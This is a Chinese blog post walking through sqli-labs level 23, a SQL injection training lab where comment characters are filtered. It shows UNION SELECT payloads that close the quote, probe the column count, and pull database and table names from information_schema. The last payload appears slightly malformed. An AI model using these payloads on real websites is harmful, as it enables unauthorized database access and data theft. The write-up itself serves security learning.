美文网首页
sqli-labs level23 过滤注释符

sqli-labs level23 过滤注释符

作者: z1挂东南 | 来源:发表于2019-07-30 16:09 被阅读0次

第二十三关

这关是GET注入方式,单引号闭合,但是找注入点的时候发现注释符被过滤了。


1.png

不能注释只能使用闭合,order by也不能用了,因为order by一般在sql语句的尾部,在order by后面再使用'闭合后面的单引号,mysql会将order by 忽略掉。
输入:?id=1' order by 100 and 1='1

2.png

实际有3个字段,但是我输入100它却没有报错,所以不能用order by,只能用union select一点一点猜了。

?id=1' union select '1
id=1' union select 1,'2
?id=1' union select 1,2,'3

当写到三个字段的时候页面显示正常了:


3.png

说明有3个字段,剩下的和显错注入一样了。

所有数据库名:?id=1.1' union select 1, (select group_concat(schema_name) from information_schema.schemata),'3
数据表名:?id=1.1' union select 1,2,'group_concat(table_name) from information_schema.tables where table_schema=database()

相关文章

  • sqli-labs level23 过滤注释符

    第二十三关 这关是GET注入方式,单引号闭合,但是找注入点的时候发现注释符被过滤了。 不能注释只能使用闭合,ord...

  • sqli-labs less23 过滤注释符

    转自不知名大佬的笔记 -----------------------------------less-23----...

  • sqli-labs Less-26-28a

    Less-26看题目可知过滤了空格和注释符以及'or','and'。一般来说仅过滤了空格时可用php注释符//来替...

  • mysql注入

    注释符 # /**/ --+ -- - %00 union,select关键过滤:/!union//!select...

  • 走进RxJava源码(五) -- 过滤型操作符

    过滤型操作符 filter过滤符 take过滤操作符 Observable.interval(2, TimeUni...

  • C#基础第二天

    1、注释符 1.注销 2.解释 2、C#的3三种注释符 1单行注释符 // 2.多行注释符 /*内容*/ 3.文档...

  • lua基本语法

    1. 注释符单行注释:-- 多行注释:--[[注视内容 --]] 或者--[=[注释内容]=] 2. 标识符传统的...

  • Rxjava(三)之过滤操作符与条件操作符

    前言 上文我们介绍了创建操作符和变换操作符。这里我们接着介绍过滤操作符和条件操作符。 过滤型操作符 过滤型操作符顾...

  • Combine - Operator(操作符)(三)

    过滤 操作符|时间控制 操作符|(计算&减少 &数学 操作符) 过滤操作符 compactMap & tryCom...

  • Java语言基础

    注释与规范 代码注释单行注释//多行注释//文本注释/...*/ 变量与常量 标示符:1 标示符是为变量、函数、宏...

网友评论

      本文标题:sqli-labs level23 过滤注释符

      本文链接:https://www.haomeiwen.com/subject/uzunrctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|sqli-labs level23 过滤注释符|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!